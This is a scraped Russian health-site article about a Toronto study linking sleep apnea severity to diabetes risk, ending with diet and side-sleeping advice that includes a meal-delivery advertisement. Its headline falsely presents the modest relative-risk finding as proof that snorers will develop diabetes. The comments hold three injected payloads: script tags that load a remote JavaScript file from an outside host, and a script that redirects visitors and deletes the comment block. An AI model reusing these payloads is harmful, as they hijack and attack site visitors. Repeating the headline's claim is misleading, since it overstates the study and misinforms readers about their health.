Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Задал храпака – проснулся...  >>  Задал храпака – проснулся с диабетом! Как спать, чтобы не заболеть?
 
Обратная связь
 

Задал храпака – проснулся с диабетом! Как спать, чтобы не заболеть?

Размер шрифта
24 февраля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Одно из крупнейших в мире исследований храпа доказало, что если вы храпите – у вас будет сахарный диабет!

Задал храпака – проснулся с диабетом! Как спать, чтобы не заболеть?

«В исследовании, в котором приняли участие более 8 тысяч человек, средний период наблюдения за каждым пациентом составил более пяти лет, благодаря чему мы смогли получить точные результаты и не повторить ошибок наших предшественников», – рассказывает доктор Тетьяна Кендзерска из Университета Торонто, ведущий автор работы. «У пациентов с апноэ сна, главным симптомом которого является храп, тяжесть заболевания определяет возможный риск развития диабета». Результаты этой работы были опубликованы в Journal of Respiratory and Critical Care Medicine

В эксперименте приняли участие 8 678 человек с подозрением на ночное апноэ. С 1994 по 2010 годы каждому было проведено полное исследование сна. В дальнейшем все пациенты находились под наблюдением на случай возникновения у них симптомов диабета. Тяжесть апноэ была оценена с помощью индекса апноэ/гипопноэ (AHI), который зависит от числа эпизодов апноэ (полное прекращение потока воздуха в дыхательных путях во время сна) и гипопноэ (частичное прекращение). Все пациенты были разделены на несколько групп: пациенты без ночного апноэ (AHI < 5), с легким течением болезни (AHI 5-14.9), среднетяжелым (AHI 15-30) и тяжелым (AHI>30) течением.

За все время исследования у 1,017 пациентов (11.7%) развился сахарный диабет. У пациентов с AHI>30 риск возникновения диабета был на 30% выше, чем у пациентов с AHI <5. Среди пациентов со среднетяжелым и тяжелым течением этот риск был выше на 23%.

«Мы смогли доказать наличие связи между тяжестью течения обструктивного ночного апноэ и риском развития сахарного диабета», – говорит доктор Кендзерска. «Так что теперь врачи смогут более внимательно относиться к этой группе пациентов и вовремя провести профилактические мероприятия», – добавляет она.

Что же делать? Самое главное – вам необходимо похудеть! Похудев всего на 5-10% от вашего веса, вы уменьшаете все риски заболеваний.

Похудеть очень просто с Диетой Елены Малышевой. Уже готовая правильная еда будет доставлена вам в любое место и время. Вам останется только есть и худеть! Кроме того, чтобы меньше храпеть, спите на боку. Для этого можно прикрепить мячик к спине на майке, который не будет позволять лечь на спину.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:18

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Муж храпит? Спасайте его – он глупеет!   Покажите свой язык, я скажу, сколько вы проживете!   Недосып! Что происходит с вашим телом?   Храп вызывает смертельное заболевание легких! Сколько храпеть вредно?  
30 мая 2013Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать 15 ноября 2012Хороший сон спасет от диабета
 
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 

Слайдшоу

1
Зачем душить мужа или все о храпе
Почему женщины не могут выспаться?
Как избавиться от храпа мужа или своего?

Тесты

1
Хорошо ли Вы спите?
Нормальный ли у вас сон?
Какой матрас вам подходит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.